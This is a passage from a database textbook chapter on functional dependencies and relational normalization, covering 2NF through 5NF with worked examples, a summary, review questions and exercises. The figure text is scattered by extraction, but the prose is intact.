EMP_PROJ relation
showing nested relations
within each tuple. (c)
Decomposition of
EMP_PROJ into relations
EMP_PROJ1 and
EMP_PROJ2 by propa-
gating the primary key.

existence of more than one multivalued attribute in one relation must be handled
carefully. As an example, consider the following non-1NF relation:

PERSON (Ss#, {Car_lic#}, {Phone#})

This relation represents the fact that a person has multiple cars and multiple
phones. If strategy 2 above is followed, it results in an all-key relation:

PERSON_IN_1NF (Ss#, Car_lic#, Phone#)

529

Basics of Functional Dependencies and Normalization for Relational Databases

To avoid introducing any extraneous relationship between Car_lic# and Phone#, all
possible combinations of values are represented for every Ss#, giving rise to redun-
dancy. This leads to the problems handled by multivalued dependencies and 4NF,
which we will discuss in Section 6. The right way to deal with the two multivalued
attributes in PERSON shown previously is to decompose it into two separate rela-
tions, using strategy 1 discussed above: P1(Ss#, Car_lic#) and P2(Ss#, Phone#).

3.5 Second Normal Form
Second normal form (2NF) is based on the concept of full functional dependency. A
functional dependency X → Y is a full functional dependency if removal of any
attribute A from X means that the dependency does not hold any more; that is, for
any attribute A ε X, (X – {A}) does not functionally determine Y. A functional
dependency X → Y is a partial dependency if some attribute A ε X can be removed
from X and the dependency still holds; that is, for some A ε X, (X – {A}) → Y. In
Figure 3(b), {Ssn, Pnumber} → Hours is a full dependency (neither Ssn → Hours nor
Pnumber → Hours holds). However, the dependency {Ssn, Pnumber} → Ename is par-
tial because Ssn → Ename holds.

Definition. A relation schema R is in 2NF if every nonprime attribute A in R is
fully functionally dependent on the primary key of R.

The test for 2NF involves testing for functional dependencies whose left-hand side
attributes are part of the primary key. If the primary key contains a single attribute,
the test need not be applied at all. The EMP_PROJ relation in Figure 3(b) is in 1NF
but is not in 2NF. The nonprime attribute Ename violates 2NF because of FD2, as do
the nonprime attributes Pname and Plocation because of FD3. The functional
dependencies FD2 and FD3 make Ename, Pname, and Plocation partially dependent
on the primary key {Ssn, Pnumber} of EMP_PROJ, thus violating the 2NF test.

If a relation schema is not in 2NF, it can be second normalized or 2NF normalized
into a number of 2NF relations in which nonprime attributes are associated only
with the part of the primary key on which they are fully functionally dependent.
Therefore, the functional dependencies FD1, FD2, and FD3 in Figure 3(b) lead to the
decomposition of EMP_PROJ into the three relation schemas EP1, EP2, and EP3
shown in Figure 11(a), each of which is in 2NF.

3.6 Third Normal Form
Third normal form (3NF) is based on the concept of transitive dependency. A
functional dependency X → Y in a relation schema R is a transitive dependency if
there exists a set of attributes Z in R that is neither a candidate key nor a subset of
any key of R,10 and both X → Z and Z → Y hold. The dependency Ssn → Dmgr_ssn
is transitive through Dnumber in EMP_DEPT in Figure 3(a), because both the

10This is the general definition of transitive dependency. Because we are concerned only with primary
keys in this section, we allow transitive dependencies where X is the primary key but Z may be (a subset
of) a candidate key.

530

Basics of Functional Dependencies and Normalization for Relational Databases

Ssn

EMP_PROJ
(a)

(b)

FD1

FD2

FD3

2NF Normalization

Pnumber Hours Ename Pname Plocation

Ssn

EP1

FD1

Pnumber Hours

Ename Ssn

ED1
Bdate Address Dnumber

Ssn

EP2

FD2

Ename Pnumber

EP3

FD3

Pname Plocation

Ename Ssn

EMP_DEPT
Bdate Address Dnumber Dname Dmgr_ssn

Dnumber

ED2
Dname Dmgr_ssn

3NF Normalization

Figure 11
Normalizing into 2NF and 3NF. (a) Normalizing EMP_PROJ into
2NF relations. (b) Normalizing EMP_DEPT into 3NF relations.

dependencies Ssn → Dnumber and Dnumber → Dmgr_ssn hold and Dnumber is nei-
ther a key itself nor a subset of the key of EMP_DEPT. Intuitively, we can see that
the dependency of Dmgr_ssn on Dnumber is undesirable in EMP_DEPT since
Dnumber is not a key of EMP_DEPT.

Definition. According to Codd’s original definition, a relation schema R is in
3NF if it satisfies 2NF and no nonprime attribute of R is transitively dependent
on the primary key.

The relation schema EMP_DEPT in Figure 3(a) is in 2NF, since no partial depen-
dencies on a key exist. However, EMP_DEPT is not in 3NF because of the transitive
dependency of Dmgr_ssn (and also Dname) on Ssn via Dnumber. We can normalize

531

Basics of Functional Dependencies and Normalization for Relational Databases

Table 1 Summary of Normal Forms Based on Primary Keys and Corresponding Normalization

Normal Form Test Remedy (Normalization)

First (1NF) Relation should have no multivalued
attributes or nested relations.

Form new relations for each multivalued
attribute or nested relation.

Second (2NF) For relations where primary key con-
tains multiple attributes, no nonkey
attribute should be functionally
dependent on a part of the primary key.

Decompose and set up a new relation for
each partial key with its dependent attrib-
ute(s). Make sure to keep a relation with
the original primary key and any attributes
that are fully functionally dependent on it.

Third (3NF) Relation should not have a nonkey
attribute functionally determined by
another nonkey attribute (or by a set of
nonkey attributes). That is, there should
be no transitive dependency of a non-
key attribute on the primary key.

Decompose and set up a relation that
includes the nonkey attribute(s) that func-
tionally determine(s) other nonkey attrib-
ute(s).

EMP_DEPT by decomposing it into the two 3NF relation schemas ED1 and ED2
shown in Figure 11(b). Intuitively, we see that ED1 and ED2 represent independent
entity facts about employees and departments. A NATURAL JOIN operation on ED1
and ED2 will recover the original relation EMP_DEPT without generating spurious
tuples.

Intuitively, we can see that any functional dependency in which the left-hand side is
part (a proper subset) of the primary key, or any functional dependency in which
the left-hand side is a nonkey attribute, is a problematic FD. 2NF and 3NF normal-
ization remove these problem FDs by decomposing the original relation into new
relations. In terms of the normalization process, it is not necessary to remove the
partial dependencies before the transitive dependencies, but historically, 3NF has
been defined with the assumption that a relation is tested for 2NF first before it is
tested for 3NF. Table 1 informally summarizes the three normal forms based on pri-
mary keys, the tests used in each case, and the corresponding remedy or normaliza-
tion performed to achieve the normal form.

4 General Definitions of Second
and Third Normal Forms

In general, we want to design our relation schemas so that they have neither partial
nor transitive dependencies because these types of dependencies cause the update
anomalies discussed in Section 1.2. The steps for normalization into 3NF relations
that we have discussed so far disallow partial and transitive dependencies on the
primary key. The normalization procedure described so far is useful for analysis in
practical situations for a given database where primary keys have already been
defined. These definitions, however, do not take other candidate keys of a relation, if

532

Basics of Functional Dependencies and Normalization for Relational Databases

any, into account. In this section we give the more general definitions of 2NF and
3NF that take all candidate keys of a relation into account. Notice that this does not
affect the definition of 1NF since it is independent of keys and functional depen-
dencies. As a general definition of prime attribute, an attribute that is part of any
candidate key will be considered as prime. Partial and full functional dependencies
and transitive dependencies will now be considered with respect to all candidate keys
of a relation.

4.1 General Definition of Second Normal Form
Definition. A relation schema R is in second normal form (2NF) if every non-
prime attribute A in R is not partially dependent on any key of R.11

The test for 2NF involves testing for functional dependencies whose left-hand side
attributes are part of the primary key. If the primary key contains a single attribute,
the test need not be applied at all. Consider the relation schema LOTS shown in
Figure 12(a), which describes parcels of land for sale in various counties of a state.
Suppose that there are two candidate keys: Property_id# and {County_name, Lot#};
that is, lot numbers are unique only within each county, but Property_id# numbers
are unique across counties for the entire state.

Based on the two candidate keys Property_id# and {County_name, Lot#}, the func-
tional dependencies FD1 and FD2 in Figure 12(a) hold. We choose Property_id# as
the primary key, so it is underlined in Figure 12(a), but no special consideration will
be given to this key over the other candidate key. Suppose that the following two
additional functional dependencies hold in LOTS:

FD3: County_name → Tax_rate
FD4: Area → Price

In words, the dependency FD3 says that the tax rate is fixed for a given county (does
not vary lot by lot within the same county), while FD4 says that the price of a lot is
determined by its area regardless of which county it is in. (Assume that this is the
price of the lot for tax purposes.)

The LOTS relation schema violates the general definition of 2NF because Tax_rate is
partially dependent on the candidate key {County_name, Lot#}, due to FD3. To nor-
malize LOTS into 2NF, we decompose it into the two relations LOTS1 and LOTS2,
shown in Figure 12(b). We construct LOTS1 by removing the attribute Tax_rate that
violates 2NF from LOTS and placing it with County_name (the left-hand side of FD3
that causes the partial dependency) into another relation LOTS2. Both LOTS1 and
LOTS2 are in 2NF. Notice that FD4 does not violate 2NF and is carried over to
LOTS1.

11This definition can be restated as follows: A relation schema R is in 2NF if every nonprime attribute A
in R is fully functionally dependent on every key of R.

533

Basics of Functional Dependencies and Normalization for Relational Databases

Property_id#

LOTS
(a)

FD1

FD2

FD3

FD4

County_name Lot# Area Price Tax_rate

Property_id#
LOTS1

(b)

FD1

FD2

FD4

County_name Lot# Area Price

(c)

(d)

Property_id#
LOTS1A

FD1

FD2

County_name Lot# Area

LOTS2

FD3

County_name Tax_rate

LOTS1B

FD4

Area Price

LOTS 1NF

LOTS1

LOTS1A LOTS1B

LOTS2 2NF

LOTS2 3NF

Candidate Key

Figure 12
Normalization into 2NF and 3NF. (a) The LOTS relation with its functional dependencies
FD1 through FD4. (b) Decomposing into the 2NF relations LOTS1 and LOTS2. (c)
Decomposing LOTS1 into the 3NF relations LOTS1A and LOTS1B. (d) Summary of the
progressive normalization of LOTS.

534

Basics of Functional Dependencies and Normalization for Relational Databases

4.2 General Definition of Third Normal Form
Definition. A relation schema R is in third normal form (3NF) if, whenever a
nontrivial functional dependency X → A holds in R, either (a) X is a superkey of
R, or (b) A is a prime attribute of R.

According to this definition, LOTS2 (Figure 12(b)) is in 3NF. However, FD4 in LOTS1
violates 3NF because Area is not a superkey and Price is not a prime attribute in
LOTS1. To normalize LOTS1 into 3NF, we decompose it into the relation schemas
LOTS1A and LOTS1B shown in Figure 12(c). We construct LOTS1A by removing the
attribute Price that violates 3NF from LOTS1 and placing it with Area (the left-hand
side of FD4 that causes the transitive dependency) into another relation LOTS1B.
Both LOTS1A and LOTS1B are in 3NF.

Two points are worth noting about this example and the general definition of 3NF:

■ LOTS1 violates 3NF because Price is transitively dependent on each of the
candidate keys of LOTS1 via the nonprime attribute Area.

■ This general definition can be applied directly to test whether a relation
schema is in 3NF; it does not have to go through 2NF first. If we apply the
above 3NF definition to LOTS with the dependencies FD1 through FD4, we
find that both FD3 and FD4 violate 3NF. Therefore, we could decompose
LOTS into LOTS1A, LOTS1B, and LOTS2 directly. Hence, the transitive and
partial dependencies that violate 3NF can be removed in any order.

4.3 Interpreting the General Definition
of Third Normal Form

A relation schema R violates the general definition of 3NF if a functional depen-
dency X → A holds in R that does not meet either condition—meaning that it vio-
lates both conditions (a) and (b) of 3NF. This can occur due to two types of
problematic functional dependencies:

■ A nonprime attribute determines another nonprime attribute. Here we typ-
ically have a transitive dependency that violates 3NF.

■ A proper subset of a key of R functionally determines a nonprime attribute.
Here we have a partial dependency that violates 3NF (and also 2NF).

Therefore, we can state a general alternative definition of 3NF as follows:

Alternative Definition. A relation schema R is in 3NF if every nonprime attribute
of R meets both of the following conditions:

■ It is fully functionally dependent on every key of R.

■ It is nontransitively dependent on every key of R.

535

Basics of Functional Dependencies and Normalization for Relational Databases

Property_id#

LOTS1A(a)

(b)

FD1

FD2

FD1

FD2

FD5

BCNF Normalization

County_name Lot# Area

Property_id#

LOTS1AX
Area Lot#

A
R

B C

Area

LOTS1AY
County_name

Figure 13
Boyce-Codd normal form. (a) BCNF
normalization of LOTS1A with the func-
tional dependency FD2 being lost in
the decomposition. (b) A schematic
relation with FDs; it is in 3NF, but not in
BCNF.

5 Boyce-Codd Normal Form
Boyce-Codd normal form (BCNF) was proposed as a simpler form of 3NF, but it
was found to be stricter than 3NF. That is, every relation in BCNF is also in 3NF;
however, a relation in 3NF is not necessarily in BCNF. Intuitively, we can see the need
for a stronger normal form than 3NF by going back to the LOTS relation schema in
Figure 12(a) with its four functional dependencies FD1 through FD4. Suppose that
we have thousands of lots in the relation but the lots are from only two counties:
DeKalb and Fulton. Suppose also that lot sizes in DeKalb County are only 0.5, 0.6,
0.7, 0.8, 0.9, and 1.0 acres, whereas lot sizes in Fulton County are restricted to 1.1,
1.2, …, 1.9, and 2.0 acres. In such a situation we would have the additional func-
tional dependency FD5: Area → County_name. If we add this to the other dependen-
cies, the relation schema LOTS1A still is in 3NF because County_name is a prime
attribute.

The area of a lot that determines the county, as specified by FD5, can be represented
by 16 tuples in a separate relation R(Area, County_name), since there are only 16 pos-
sible Area values (see Figure 13). This representation reduces the redundancy of
repeating the same information in the thousands of LOTS1A tuples. BCNF is a
stronger normal form that would disallow LOTS1A and suggest the need for decom-
posing it.

Definition. A relation schema R is in BCNF if whenever a nontrivial functional
dependency X → A holds in R, then X is a superkey of R.

536

Basics of Functional Dependencies and Normalization for Relational Databases

TEACH

Student
Narayan

Smith

Smith

Smith

Mark

Navathe

Ammar

Schulman

Operating Systems

Database

Database

Theory

Wallace

Wallace

Wong

Zelaya

Mark

Ahamad

Omiecinski

Navathe

Database

Database

Operating Systems

Database

Course Instructor

Narayan Operating Systems Ammar

Figure 14
A relation TEACH that is in
3NF but not BCNF.

The formal definition of BCNF differs from the definition of 3NF in that condition
(b) of 3NF, which allows A to be prime, is absent from BCNF. That makes BCNF a
stronger normal form compared to 3NF. In our example, FD5 violates BCNF in
LOTS1A because AREA is not a superkey of LOTS1A. Note that FD5 satisfies 3NF in
LOTS1A because County_name is a prime attribute (condition b), but this condition
does not exist in the definition of BCNF. We can decompose LOTS1A into two BCNF
relations LOTS1AX and LOTS1AY, shown in Figure 13(a). This decomposition loses
the functional dependency FD2 because its attributes no longer coexist in the same
relation after decomposition.

In practice, most relation schemas that are in 3NF are also in BCNF. Only if X → A
holds in a relation schema R with X not being a superkey and A being a prime
attribute will R be in 3NF but not in BCNF. The relation schema R shown in Figure
13(b) illustrates the general case of such a relation. Ideally, relational database
design should strive to achieve BCNF or 3NF for every relation schema. Achieving
the normalization status of just 1NF or 2NF is not considered adequate, since they
were developed historically as stepping stones to 3NF and BCNF.

As another example, consider Figure 14, which shows a relation TEACH with the fol-
lowing dependencies:

FD1: {Student, Course} → Instructor
FD2:12 Instructor → Course

Note that {Student, Course} is a candidate key for this relation and that the depen-
dencies shown follow the pattern in Figure 13(b), with Student as A, Course as B,
and Instructor as C. Hence this relation is in 3NF but not BCNF. Decomposition of
this relation schema into two schemas is not straightforward because it may be

12This dependency means that each instructor teaches one course is a constraint for this application.

537

Basics of Functional Dependencies and Normalization for Relational Databases

decomposed into one of the three following possible pairs:

1. {Student, Instructor} and {Student, Course}.

2. {Course, Instructor} and {Course, Student}.

3. {Instructor, Course} and {Instructor, Student}.

All three decompositions lose the functional dependency FD1. The desirable decom-
position of those just shown is 3 because it will not generate spurious tuples after a
join.

A test to determine whether a decomposition is nonadditive (or lossless) is dis-
cussed under Property NJB. In general, a relation not in BCNF should be decom-
posed so as to meet this property.

We make sure that we meet this property, because nonadditive decomposition is a
must during normalization. We may have to possibly forgo the preservation of all
functional dependencies in the decomposed relations, as is the case in this example.
The algorithm used to give decomposition 3 for TEACH which yields two relations
in BCNF as:

(Instructor, Course) and (Instructor, Student)

Note that if we designate (Student, Instructor) as a primary key of the relation
TEACH, the FD Instructor → Course causes a partial (non-full-functional) depend-
ency of Course on a part of this key. This FD may be removed as a part of second
normalization yielding exactly the same two relations in the result. This is an
example of a case where we may reach the same ultimate BCNF design via alternate
paths of normalization.

6 Multivalued Dependency
and Fourth Normal Form

So far we have discussed the concept of functional dependency, which is by far the
most important type of dependency in relational database design theory, and nor-
mal forms based on functional dependencies. However, in many cases relations have
constraints that cannot be specified as functional dependencies. In this section, we
discuss the concept of multivalued dependency (MVD) and define fourth normal
form, which is based on this dependency. Multivalued dependencies are a conse-
quence of first normal form (1NF) (see Section 3.4), which disallows an attribute in
a tuple to have a set of values, and the accompanying process of converting an
unnormalized relation into 1NF. If we have two or more multivalued independent
attributes in the same relation schema, we get into a problem of having to repeat
every value of one of the attributes with every value of the other attribute to keep
the relation state consistent and to maintain the independence among the attributes
involved. This constraint is specified by a multivalued dependency.

538

Basics of Functional Dependencies and Normalization for Relational Databases

(a) EMP

Ename

Smith
Smith

Smith

Smith

John
Anna

Anna

John

X

Y

X

Y

Pname Dname

(b) EMP_PROJECTS

Ename

Smith

Smith

X

Y

Pname

EMP_DEPENDENTS

Ename

Smith
Smith

John
Anna

Dname

(c) SUPPLY

Sname

Smith

Smith

Adamsky

Walton

Adamsky

Adamsky

Smith

Bolt

Bolt

Nut

Bolt

Nut

Nail

Bolt

ProjY

ProjX

ProjY

ProjX

ProjZ

ProjX

ProjY

Part_name Proj_name

(d) R1
Sname

Smith

Smith

Adamsky

Walton

Adamsky

Bolt

Bolt

Nut

Nut

Nail

Bolt

Bolt

Nut

Nut

Nail

Part_name

R2
Sname

Smith

Smith

Adamsky

Walton

Adamsky

Proj_name

ProjY

ProjX

ProjY

ProjZ

ProjX

R3
Part_name Proj_name

ProjY

ProjX

ProjY

ProjZ

ProjX

Figure 15
Fourth and fifth normal forms.
(a) The EMP relation with two MVDs: Ename →→ Pname and Ename →→ Dname.
(b) Decomposing the EMP relation into two 4NF relations EMP_PROJECTS and

EMP_DEPENDENTS.
(c) The relation SUPPLY with no MVDs is in 4NF but not in 5NF if it has the JD(R1, R2, R3).
(d) Decomposing the relation SUPPLY into the 5NF relations R1, R2, R3.

For example, consider the relation EMP shown in Figure 15(a). A tuple in this EMP
relation represents the fact that an employee whose name is Ename works on the
project whose name is Pname and has a dependent whose name is Dname. An
employee may work on several projects and may have several dependents, and the
employee’s projects and dependents are independent of one another.13 To keep the
relation state consistent, and to avoid any spurious relationship between the two
independent attributes, we must have a separate tuple to represent every combina-
tion of an employee’s dependent and an employee’s project. This constraint is spec-

13In an ER diagram, each would be represented as a multivalued attribute or as a weak entity type.

539

Basics of Functional Dependencies and Normalization for Relational Databases

ified as a multivalued dependency on the EMP relation, which we define in this sec-
tion. Informally, whenever two independent 1:N relationships A:B and A:C are
mixed in the same relation, R(A, B, C), an MVD may arise.14

6.1 Formal Definition of Multivalued Dependency
Definition. A multivalued dependency X →→ Y specified on relation schema R,
where X and Y are both subsets of R, specifies the following constraint on any
relation state r of R: If two tuples t1 and t2 exist in r such that t1[X] = t2[X], then
two tuples t3 and t4 should also exist in r with the following properties,

15 where
we use Z to denote (R – (X ∪ Y)):16

■ t3[X] = t4[X] = t1[X] = t2[X].

■ t3[Y] = t1[Y] and t4[Y] = t2[Y].

■ t3[Z] = t2[Z] and t4[Z] = t1[Z].

Whenever X →→ Y holds, we say that X multidetermines Y. Because of the symme-
try in the definition, whenever X →→ Y holds in R, so does X →→ Z. Hence, X →→ Y
implies X →→ Z, and therefore it is sometimes written as X →→ Y|Z.

An MVD X →→ Y in R is called a trivial MVD if (a) Y is a subset of X, or (b) X ∪ Y
= R. For example, the relation EMP_PROJECTS in Figure 15(b) has the trivial MVD
Ename →→ Pname. An MVD that satisfies neither (a) nor (b) is called a nontrivial
MVD. A trivial MVD will hold in any relation state r of R; it is called trivial because
it does not specify any significant or meaningful constraint on R.

If we have a nontrivial MVD in a relation, we may have to repeat values redundantly
in the tuples. In the EMP relation of Figure 15(a), the values ‘X’ and ‘Y’ of Pname are
repeated with each value of Dname (or, by symmetry, the values ‘John’ and ‘Anna’ of
Dname are repeated with each value of Pname). This redundancy is clearly undesir-
able. However, the EMP schema is in BCNF because no functional dependencies
hold in EMP. Therefore, we need to define a fourth normal form that is stronger
than BCNF and disallows relation schemas such as EMP. Notice that relations con-
taining nontrivial MVDs tend to be all-key relations—that is, their key is all their
attributes taken together. Furthermore, it is rare that such all-key relations with a
combinatorial occurrence of repeated values would be designed in practice.
However, recognition of MVDs as a potential problematic dependency is essential
in relational design.

We now present the definition of fourth normal form (4NF), which is violated
when a relation has undesirable multivalued dependencies, and hence can be used
to identify and decompose such relations.

14This MVD is denoted as A →→ B|C.
15The tuples t1, t2, t3, and t4 are not necessarily distinct.
16Z is shorthand for the attributes in R after the attributes in (X ∪ Y) are removed from R.

540

Basics of Functional Dependencies and Normalization for Relational Databases

Definition. A relation schema R is in 4NF with respect to a set of dependencies
F (that includes functional dependencies and multivalued dependencies) if, for
every nontrivial multivalued dependency X →→ Y in F+17 X is a superkey for R.

We can state the following points:

■ An all-key relation is always in BCNF since it has no FDs.

■ An all-key relation such as the EMP relation in Figure 15(a), which has no
FDs but has the MVD Ename →→ Pname | Dname, is not in 4NF.

■ A relation that is not in 4NF due to a nontrivial MVD must be decomposed
to convert it into a set of relations in 4NF.

■ The decomposition removes the redundancy caused by the MVD.

The process of normalizing a relation involving the nontrivial MVDs that is not in
4NF consists of decomposing it so that each MVD is represented by a separate rela-
tion where it becomes a trivial MVD. Consider the EMP relation in Figure 15(a).
EMP is not in 4NF because in the nontrivial MVDs Ename →→ Pname and Ename
→→ Dname, and Ename is not a superkey of EMP. We decompose EMP into
EMP_PROJECTS and EMP_DEPENDENTS, shown in Figure 15(b). Both
EMP_PROJECTS and EMP_DEPENDENTS are in 4NF, because the MVDs Ename
→→ Pname in EMP_PROJECTS and Ename →→ Dname in EMP_DEPENDENTS are
trivial MVDs. No other nontrivial MVDs hold in either EMP_PROJECTS or
EMP_DEPENDENTS. No FDs hold in these relation schemas either.

7 Join Dependencies
and Fifth Normal Form

In our discussion so far, we have pointed out the problematic functional dependen-
cies and showed how they were eliminated by a process of repeated binary decom-
position to remove them during the process of normalization to achieve 1NF, 2NF,
3NF and BCNF. These binary decompositions must obey the NJB property that we
referenced while discussing the decomposition to achieve BCNF. Achieving 4NF
typically involves eliminating MVDs by repeated binary decompositions as well.
However, in some cases there may be no nonadditive join decomposition of R into
two relation schemas, but there may be a nonadditive join decomposition into more
than two relation schemas. Moreover, there may be no functional dependency in R
that violates any normal form up to BCNF, and there may be no nontrivial MVD
present in R either that violates 4NF. We then resort to another dependency called
the join dependency and, if it is present, carry out a multiway decomposition into fifth
normal form (5NF). It is important to note that such a dependency is a very pecu-
liar semantic constraint that is very difficult to detect in practice; therefore, normal-
ization into 5NF is very rarely done in practice.

17F+ refers to the cover of functional dependencies F, or all dependencies that are implied by F.

541

Basics of Functional Dependencies and Normalization for Relational Databases

Definition. A join dependency (JD), denoted by JD(R1, R2, …, Rn), specified on
relation schema R, specifies a constraint on the states r of R. The constraint
states that every legal state r of R should have a nonadditive join decomposition
into R1, R2, …, Rn. Hence, for every such r we have

∗ (πR1(r), πR2(r), …, πRn(r)) = r

Notice that an MVD is a special case of a JD where n = 2. That is, a JD denoted as
JD(R1, R2) implies an MVD (R1 ∩ R2) →→ (R1 – R2) (or, by symmetry, (R1 ∩ R2)
→→(R2 – R1)). A join dependency JD(R1, R2, …, Rn), specified on relation schema R,
is a trivial JD if one of the relation schemas Ri in JD(R1, R2, …, Rn) is equal to R.
Such a dependency is called trivial because it has the nonadditive join property for
any relation state r of R and thus does not specify any constraint on R. We can now
define fifth normal form, which is also called project-join normal form.

Definition. A relation schema R is in fifth normal form (5NF) (or project-join
normal form (PJNF)) with respect to a set F of functional, multivalued, and
join dependencies if, for every nontrivial join dependency JD(R1, R2, …, Rn) in
F+ (that is, implied by F),18 every Ri is a superkey of R.

For an example of a JD, consider once again the SUPPLY all-key relation in Figure
15(c). Suppose that the following additional constraint always holds: Whenever a
supplier s supplies part p, and a project j uses part p, and the supplier s supplies at
least one part to project j, then supplier s will also be supplying part p to project j.
This constraint can be restated in other ways and specifies a join dependency JD(R1,
R2, R3) among the three projections R1(Sname, Part_name), R2(Sname, Proj_name),
and R3(Part_name, Proj_name) of SUPPLY. If this constraint holds, the tuples below
the dashed line in Figure 15(c) must exist in any legal state of the SUPPLY relation
that also contains the tuples above the dashed line. Figure 15(d) shows how the
SUPPLY relation with the join dependency is decomposed into three relations R1, R2,
and R3 that are each in 5NF. Notice that applying a natural join to any two of these
relations produces spurious tuples, but applying a natural join to all three together
does not. The reader should verify this on the sample relation in Figure 15(c) and its
projections in Figure 15(d). This is because only the JD exists, but no MVDs are
specified. Notice, too, that the JD(R1, R2, R3) is specified on all legal relation states,
not just on the one shown in Figure 15(c).

Discovering JDs in practical databases with hundreds of attributes is next to impos-
sible. It can be done only with a great degree of intuition about the data on the part
of the designer. Therefore, the current practice of database design pays scant atten-
tion to them.

8 Summary
In this chapter we discussed several pitfalls in relational database design using intu-
itive arguments. We identified informally some of the measures for indicating

18Again, F+ refers to the cover of functional dependencies F, or all dependencies that are implied by F.

542

Basics of Functional Dependencies and Normalization for Relational Databases

whether a relation schema is good or bad, and provided informal guidelines for a
good design. These guidelines are based on doing a careful conceptual design in the
ER and EER model, following mapping procedure correctly to map entities and
relationships into relations. Proper enforcement of these guidelines and lack of
redundancy will avoid the insertion/deletion/update anomalies, and generation of
spurious data. We recommended limiting NULL values, which cause problems dur-
ing SELECT, JOIN, and aggregation operations. Then we presented some formal
concepts that allow us to do relational design in a top-down fashion by analyzing
relations individually. We defined this process of design by analysis and decomposi-
tion by introducing the process of normalization.

We defined the concept of functional dependency, which is the basic tool for analyz-
ing relational schemas, and discussed some of its properties. Functional dependen-
cies specify semantic constraints among the attributes of a relation schema. Next we
described the normalization process for achieving good designs by testing relations
for undesirable types of problematic functional dependencies. We provided a treat-
ment of successive normalization based on a predefined primary key in each rela-
tion, and then relaxed this requirement and provided more general definitions of
second normal form (2NF) and third normal form (3NF) that take all candidate
keys of a relation into account. We presented examples to illustrate how by using the
general definition of 3NF a given relation may be analyzed and decomposed to
eventually yield a set of relations in 3NF.

We presented Boyce-Codd normal form (BCNF) and discussed how it is a stronger
form of 3NF. We also illustrated how the decomposition of a non-BCNF relation
must be done by considering the nonadditive decomposition requirement. Then we
introduced the fourth normal form based on multivalued dependencies that typi-
cally arise due to mixing independent multivalued attributes into a single relation.
Finally, we introduced the fifth normal form, which is based on join dependency,
and which identifies a peculiar constraint that causes a relation to be decomposed
into several components so that they always yield the original relation back after a
join. In practice, most commercial designs have followed the normal forms up to
BCNF. Need for decomposing into 5NF rarely arises in practice, and join dependen-
cies are difficult to detect for most practical situations, making 5NF more of theo-
retical value.

Review Questions
1. Discuss attribute semantics as an informal measure of goodness for a rela-

tion schema.

543

Basics of Functional Dependencies and Normalization for Relational Databases

2. Discuss insertion, deletion, and modification anomalies. Why are they con-
sidered bad? Illustrate with examples.

3. Why should NULLs in a relation be avoided as much as possible? Discuss the
problem of spurious tuples and how we may prevent it.

4. State the informal guidelines for relation schema design that we discussed.
Illustrate how violation of these guidelines may be harmful.

5. What is a functional dependency? What are the possible sources of the infor-
mation that defines the functional dependencies that hold among the attrib-
utes of a relation schema?

6. Why can we not infer a functional dependency automatically from a partic-
ular relation state?

7. What does the term unnormalized relation refer to? How did the normal
forms develop historically from first normal form up to Boyce-Codd normal
form?

8. Define first, second, and third normal forms when only primary keys are
considered. How do the general definitions of 2NF and 3NF, which consider
all keys of a relation, differ from those that consider only primary keys?

9. What undesirable dependencies are avoided when a relation is in 2NF?

10. What undesirable dependencies are avoided when a relation is in 3NF?

11. In what way do the generalized definitions of 2NF and 3NF extend the defi-
nitions beyond primary keys?

12. Define Boyce-Codd normal form. How does it differ from 3NF? Why is it
considered a stronger form of 3NF?

13. What is multivalued dependency? When does it arise?

14. Does a relation with two or more columns always have an MVD? Show with
an example.

15. Define fourth normal form. When is it violated? When is it typically
applicable?

16. Define join dependency and fifth normal form.

17. Why is 5NF also called project-join normal form (PJNF)?

18. Why do practical database designs typically aim for BCNF and not aim for
higher normal forms?

Exercises
19. Suppose that we have the following requirements for a university database

that is used to keep track of students’ transcripts:

a. The university keeps track of each student’s name (Sname), student num-
ber (Snum), Social Security number (Ssn), current address (Sc_addr) and

544

Basics of Functional Dependencies and Normalization for Relational Databases

phone (Sc_phone), permanent address (Sp_addr) and phone (Sp_phone),
birth date (Bdate), sex (Sex), class (Class) (‘freshman’, ‘sophomore’, … ,
‘graduate’), major department (Major_code), minor department
(Minor_code) (if any), and degree program (Prog) (‘b.a.’, ‘b.s.’, … , ‘ph.d.’).
Both Ssn and student number have unique values for each student.

b. Each department is described by a name (Dname), department code
(Dcode), office number (Doffice), office phone (Dphone), and college
(Dcollege). Both name and code have unique values for each department.

c. Each course has a course name (Cname), description (Cdesc), course
number (Cnum), number of semester hours (Credit), level (Level), and
offering department (Cdept). The course number is unique for each
course.

d. Each section has an instructor (Iname), semester (Semester), year (Year),
course (Sec_course), and section number (Sec_num). The section number
distinguishes different sections of the same course that are taught during
the same semester/year; its values are 1, 2, 3, …, up to the total number of
sections taught during each semester.

e. A grade record refers to a student (Ssn), a particular section, and a grade
(Grade).

Design a relational database schema for this database application. First show
all the functional dependencies that should hold among the attributes. Then
design relation schemas for the database that are each in 3NF or BCNF.
Specify the key attributes of each relation. Note any unspecified require-
ments, and make appropriate assumptions to render the specification
complete.

20. What update anomalies occur in the EMP_PROJ and EMP_DEPT relations of
Figures 3 and 4?

21. In what normal form is the LOTS relation schema in Figure 12(a) with
respect to the restrictive interpretations of normal form that take only the
primary key into account? Would it be in the same normal form if the gen-
eral definitions of normal form were used?

22. Prove that any relation schema with two attributes is in BCNF.

23. Why do spurious tuples occur in the result of joining the EMP_PROJ1 and
EMP_ LOCS relations in Figure 5 (result shown in Figure 6)?

24. Consider the universal relation R = {A, B, C, D, E, F, G, H, I, J} and the set of
functional dependencies F = { {A, B}→{C}, {A}→{D, E}, {B}→{F}, {F}→{G,
H}, {D}→{I, J} }. What is the key for R? Decompose R into 2NF and then
3NF relations.

25. Repeat Exercise 24 for the following different set of functional dependencies
G = {{A, B}→{C}, {B, D}→{E, F}, {A, D}→{G, H}, {A}→{I}, {H}→{J} }.

545

Basics of Functional Dependencies and Normalization for Relational Databases

A B C TUPLE#
10 b1 c1 1
10 b2 c2 2
11 b4 c1 3
12 b3 c4 4
13 b1 c1 5
14 b3 c4 6

26. Consider the following relation:

a. Given the previous extension (state), which of the following dependencies
may hold in the above relation? If the dependency cannot hold, explain
why by specifying the tuples that cause the violation.

i. A → B, ii. B → C, iii. C → B, iv. B → A, v. C → A
b. Does the above relation have a potential candidate key? If it does, what is

it? If it does not, why not?

27. Consider a relation R(A, B, C, D, E) with the following dependencies:

AB → C, CD → E, DE → B
Is AB a candidate key of this relation? If not, is ABD? Explain your answer.

28. Consider the relation R, which has attributes that hold schedules of courses
and sections at a university; R = {Course_no, Sec_no, Offering_dept,
Credit_hours, Course_level, Instructor_ssn, Semester, Year, Days_hours, Room_no,
No_of_students}. Suppose that the following functional dependencies hold
on R:

